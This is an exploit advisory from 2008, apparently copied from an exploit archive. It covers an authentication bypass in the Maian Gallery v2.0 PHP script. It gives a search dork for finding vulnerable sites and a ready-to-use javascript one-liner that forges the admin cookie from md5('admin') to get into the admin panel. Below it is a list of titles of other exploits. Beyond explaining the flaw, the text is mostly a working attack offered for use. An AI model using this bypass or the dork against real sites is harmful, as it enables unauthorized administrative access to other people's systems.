Author: Saime
Date: July 12, 2008
Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Gallery v2.0 Copyright © 2006-2008 Maian Script World. All Rights Reserved.
Description:
Maian Gallery v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mgallery_admin_cookie,
equals admin username(md5)
Exploit:
javascript:document.cookie = "mgallery_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/php/demos/mgallery/admin/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
【Maian Gallery 2.0 Insecure Cookie Handling Vulnerability】相关文章:
★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
★ Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities